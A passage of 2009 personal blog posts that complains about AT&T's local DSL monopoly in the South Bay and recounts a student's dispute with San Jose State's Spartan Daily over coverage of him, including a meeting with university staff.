But a problem came up pretty quickly: while there are a number of local ISPs for the South Bay, none of them were feasible. The only company that uses ADSL for residential purposes is north of San Francisco (too far), and the rest, both cable and DSL, were more than happy to offer their services, so long as I had an AT&T phone account.

So, just to clarify: if I wanted internet service that wasn’t from AT&T (who I currently have ADSL with, no phone number necessary), I’d have to get phone service (at $14.95/mth) with the very same company I’m trying to leave. Either that or become a customer of Comcast again, for $33/mth that would double after a few months to $66/mth – more than I pay now for “Elite PRO DSL” ($45/mth) and with worse speeds.

I was pretty angry, and set out to find out why I had to have AT&T phone service to have plans with these local ISPs – even those that were providing “cable” or “fusion” network connections. The answer was pretty simple, and I didn’t have to do much digging: AT&T owns almost all of the phone lines in the South Bay area. They don’t rent them, monitor them, or manage them, but own them, and for consumer traffic to cross their lines they require a phone service account.

There’s a number of issues with this, but the first that comes to mind is pretty basic: why is Verizon nowhere to be found within the Bay Area? Their FiOS program is exploding to the point that they’re giving up the landline phone service business, and yet the company that is known for providing the fastest, best, most reliable next-generation broadband services cannot be found within Silicon Valley. How is that a good business decision? As a company, Verizon would stand to easily make millions from the countless rich nerds that populate the Bay Area who would love to have fiber-to-the-home. But even if Verizon seems to think it’s in their best interest to ignore Silicon Valley, where is Time Warner? Or Earthlink? Or even Covad, with a residential offering? These large companies are the kinds of corporate behemoths that would force AT&T to make concessions, so consumers wouldn’t have to have dual accounts.

The second major issue is pretty obvious as well: why does AT&T own all the phone lines in the Bay Area? This is obviously not something that’s going to benefit the general public, and doesn’t seem like the sort of power governments (local, state, and federal) would want to give to a breakup child of the Bell monopoly. In many areas, phone lines are owned by the state, and companies rent or “pay to manage” these lines – the only time a line is owned by a company is when it’s long-haul or a line to a residence. But California chose, in all its magnificence, to let AT&T own the phone lines and essentially stifle local competition.

Finally, the other, and most important, issue is one of monopoly. The sort of de facto local monopoly that AT&T has on DSL and landline phone service in the South Bay is not a unique case, similar to how Comcast is the only provider of cable. All across the country, consumers have no choice when they want DSL, phone, or cable service, and instead have to use the only offering available – this results in higher prices, corporate indifference, and unnecessary corporate growth. At a minimum, there should be two major offerings for all services in any given urban/suburban area, which the FCC seems to realize with the cap of Comcast’s nationwide customer base.

But, somehow, they have ignored the local monopolies that develop either out of coincidence, intent, or collusion - even while customers continue to be ignored, lied to, and overall screwed. Does anyone really wonder why both AT&T and Comcast feel that they can lie to the FCC - about numerous issues, on varied occasions - and get away with it? When you have a large customer base that will never significantly shrink, you can depend on certain levels of income year after year – certainly more than enough to pay for litigation and the FCC’s fines.

I’m disgusted that I’ve been put in such a corner, but I truly have no choice. Comcast is the one true Antichrist, so I will not be their customer again – and yet AT&T is the Antichrist’s First Disciple. When faced with the choice of a $15/mth phone line plus $40/mth internet service, or $45/mth internet service, which option does a poor college student take? The least expensive one, of course.

Which in this case means I’m continuing to support the very company that hates my existence, proven by the double-billing, lying, traffic filtering, and overall poor customer service I’ve received since I became their customer two years ago.

What a load of crap.

The Spartan Daily: A Followup, with Closure [Expose]

Kyle Brady — Tue, 08 Sep 2009 18:24:10 +0000

follow the update thread for the latest chapter in the saga

This morning I had a meeting with the Dean of Students for the College of Applied Sciences and Arts at SJSU (Dr. Charles Bullock), regarding the recent “Spartan Daily Debacle” where the School Director of Journalism and Mass Communications (Dr. William Briggs) and a Faculty Advisor for the school paper (Mack Lundstrom).

I feel as if the meeting was an overall success, and the issue can now be considered closed - the general outline and outcome from this morning is as follows.

Meeting’s Intent

I originally contacted the Vice President for Student Affairs, Dr. Veril Phillips, requesting a meeting with either him or the school’s President, Dr. Whitmore. I received a response a few days later indicating that an investigation was ongoing as to who could best suit my needs, and the following day a scheduling request was made via email for a meeting between myself and the other members that were present this morning.

My intent was twofold: to make the Administration aware, at the highest levels, of the situation, as well as register my concerns – which, while stated elsewhere, were essentially:

the handling of the situation by the Spartan Daily, and its ethical implications

the resultant public image I may have as a “troublemaker”

the unnecessary and unprofessional response I received from Hank Drew, the paper’s Editor

In addition to registering my concerns and creating awareness, I wanted an official apology from Hank Drew for his explosive reaction to my criticisms.

Discussion Topics

We covered my intent and concerns, followed by comments from Dr. Bullock, Dr. Briggs, and Professor Lundstrom. Over the course of the discussion, Professor Lundstrom admitted to the mishandling, on multiple counts, of the issue, although it was purportedly unintentional – the photo miscaptioning (and mislabeling as a “photo” instead of a “photo illustration”), shortened article, and the editing of my Editorial Letter were all mangled in one form or another, and could have been handled more appropriately. On this, we agreed.

Both Professor Lundstrom and Dr. Briggs stressed that this was not an issue of the Administration leaning on the paper, but just an unfortunate series of events that led to the now-obvious conclusion. The paper is apparently somewhere in-between an outside publication and an in-house one, and strives for journalistic integrity and independence while having a faculty advising staff that doesn’t interfere or set mandates and receives funding from the university. I assumed as much, but it's nice to have this made clear.

Dr. Briggs commented that he partially sees this as my non-appreciation of the story as a “source unhappy with the final article”, but as Professor Lundstrom agreed with my concerns and this is not my first appearance in the public eye by another’s hand, this isn’t the case.

We discussed how the “Beeson Debacle” is still ongoing, as I’m readying an offensive to his actions this semester, and that the paper would potentially be very interested in a future story after the forthcoming battle is resolved, or at least has a temporary endpoint.

Finally, Dr. Bullock agreed that my concerns were sizeable and legitimate, and that the whole string of events was unfortunate – the President, Vice President, and Provost of SJSU were apparently highly interested in the outcome of this meeting as well.

Outcomes

The outcomes of this meeting were pretty clear, despite no comment on an apology from Hank Drew:

The Spartan Daily did not intend to slant the story, and they are apologetic for the mistakes made throughout the process.

My Editorial Letter will be published in full, unedited, on the Daily’s website – including the links and contact information that they originally, conveniently omitted.

My efforts to call out the paper on potentially shady actions, as well as speak out in my public defense, were expressly appreciated by Professor Lundstrom, further commenting that I might have a journalistic future should I desire it.

The Daily is interested in hearing further on the progress of my attempts at a defense of student’s rights.

The University’s President, Vice President, Provost, and other appropriate individuals within the Administration will be made aware of these events and the actions, as well as missteps, that took place by parties involved.

I appreciate the time that the three of them took to meet with me and address my concerns, and I consider the situation largely closed, pending further mishandling of similar Administration-related issues by the Spartan Daily.

Hank Drew: a written apology would go far in rectifying your unprofessional and unnecessarily vicious reaction via email to criticisms of the paper, where you hold the position of Editor, that have since been verified as valid and legitimate.

Emails

To: Dr. Phillips

From: Me

Date: 8/28/2009

Hi Dr. Phillips,

I'd like to make an appointment to talk with either you or Dr. Whitmore, regarding the slander and vilification I received over the last week at the hands of the Spartan Daily, across many publications.

If you'd like some background on what I'm talking about, please read my detailed description of the original issue (from Monday 8/25/2009) and the follow-up disaster that occurred on Thursday (8/27/2009).

Thanks, I look forward to hearing from you.

The Spartan Daily Debacle Update Thread [Expose]

Kyle Brady — Fri, 28 Aug 2009 20:45:34 +0000

last updated 9/8/2009 12:20pm PST

This post will serve as a helpful thread of updates on the "Beeson Debacle" and The Spartan Daily's failed journalistic endeavors.

Dr. Beeson tried to fail me in Spring 2009 for posting code solutions online after the due-dates, and was prevented from doing so. [6/10/2009]

SJSU's Spartan Daily reported on this, to much journalistic failure. [8/26/2009]

The Spartan Daily edited my letter for publishing, and managed to get facts wrong once again - plus a hilarious email from the paper's Editor. [8/28/2009]

The Administration has been met regarding this issue, and is considered closed by both parties. [9/8/2009]